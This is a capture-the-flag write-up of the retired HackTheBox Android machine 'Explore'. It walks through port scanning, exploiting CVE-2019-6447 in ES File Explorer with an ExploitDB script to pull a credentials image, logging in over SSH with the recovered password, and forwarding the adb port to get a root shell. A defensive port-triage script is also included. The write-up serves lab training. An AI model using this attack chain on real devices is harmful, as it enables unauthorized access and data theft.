HTB - Explore

This was classified as an easy box by bertolis on HackTheBox and was my first experience with Android exploitation. Enumerating the open ports, we discover SSH, Android Debug Bridge (adb), and ES File Explorer, which is vulnerable to CVE-2019-6447 and will be our method of gaining a foothold. For privilege escalation, we will set up an SSH tunnel to execute adb commands and gain root.

OS Difficulty IP Address Status
Android Easy Retired

Phase 1 - Enumeration


We first run a network scan to enumerate open ports.

2222/tcp open     ssh     (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey: 
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp filtered freeciv
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :

From the results above, we see that SSH is open on port 2222 and its banner reads "Banana Studio." A quick Google search reveals that Banana Studio is an SSH server for Android operating systems.

Since we are not sure whether the previous nmap command showed all open ports, we will also run a full port scan on the target with the following: sudo nmap -p-


2222/tcp  open     EtherNetIP-1
5555/tcp  filtered freeciv
42135/tcp open     unknown
45225/tcp open     unknown
59777/tcp open     unknown

The scan shows four open ports (2222, 42135, 45225, 59777) and one filtered port (5555), so I did some research on common uses of those ports on Android operating systems. Information I found included:

  • 2222: SimpleSSH
  • 5555: Android Debug Bridge (ADB)
  • 59777: ES File Explorer

Phase 2 - Exploitation


Researching each port, we find that port 59777 belongs to ES File Explorer, which has a vulnerability that allows remote attackers to read arbitrary files or execute applications via TCP port 59777 requests on the local network.

Looking in ExploitDB, we find a proof-of-concept Python exploit script for CVE-2019-6447.

Running the Python script with the following command shows us the picture listing on the device: python3 listPics

OUTPUT: creds.jpg looks the most interesting

Let’s download creds.jpg with the following command. python3 getFile /storage/emulated/0/DCIM/creds.jpg

Opening the image reveals: kristi:Kr1sT!5h@Rp3xPl0r3!

We now have some credentials, so we will try to log in to the SSH server running on the Android device with the following command: ssh [email protected] -p 2222


And we get in, gaining our foothold! user.txt can be found in sdcard/user.txt

Phase 3 - Privilege Escalation

Port Forwarding

Since we have access to the device through SSH and we know that there's an ADB service running on port 5555, we can execute commands with ADB. To run ADB commands on the device, we first have to set up SSH port forwarding with the following command:

ssh [email protected] -p 2222 -L 5555:localhost:5555
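
The scan reported port 5555 as filtered, yet the forward above reaches adb through the device's loopback interface. The following Python triage of nmap port lines is an added example, not part of the original write-up; it flags that combination alongside the exposed ES File Explorer port. The function names, severity labels and messages are assumptions, and the sample input is constructed from the port lines shown earlier.

```python
import re

# Port roles taken from the write-up's own research list.
ANDROID_PORTS = {2222: "SSH server", 5555: "Android Debug Bridge (adb)",
                 59777: "ES File Explorer (CVE-2019-6447)"}

# Matches nmap normal-output port lines such as "5555/tcp filtered freeciv".
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")

def parse_ports(nmap_text):
    """Return {port: state} for every port line in nmap's normal output."""
    ports = {}
    for line in nmap_text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            ports[int(m.group(1))] = m.group(3)
    return ports

def triage(nmap_text):
    """Return (severity, message) findings for a scanned Android host."""
    ports = parse_ports(nmap_text)
    findings = []
    if ports.get(59777) == "open":
        findings.append(("high", "59777 open: ES File Explorer service exposed to the network"))
    if ports.get(5555) == "open":
        findings.append(("high", "5555 open: adb over TCP exposed directly"))
    elif ports.get(5555) == "filtered" and ports.get(2222) == "open":
        # A packet filter in front of adb does not protect the loopback path.
        findings.append(("medium", "5555 filtered but SSH open: adb still reachable "
                                   "by any SSH user through a local port forward"))
    for port, state in sorted(ports.items()):
        if state == "open" and port not in ANDROID_PORTS:
            findings.append(("info", f"{port} open: unidentified service, investigate"))
    return findings

# Constructed sample: the full-scan port lines shown in this write-up.
SAMPLE = """\
2222/tcp  open     EtherNetIP-1
5555/tcp  filtered freeciv
42135/tcp open     unknown
45225/tcp open     unknown
59777/tcp open     unknown
"""

if __name__ == "__main__":
    for severity, message in triage(SAMPLE):
        print(f"[{severity}] {message}")
```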

Android Debug Bridge (adb)

ADB commands help ⇐ Official documentation to adb commands.

We will run the following commands on the device, gain a shell, and escalate that shell to root.

# to establish a connection
adb connect

# to list connected devices
adb devices

# to connect to specified device with interactive shell
adb -s shell


And we are root! root.txt can be found in /data/root.txt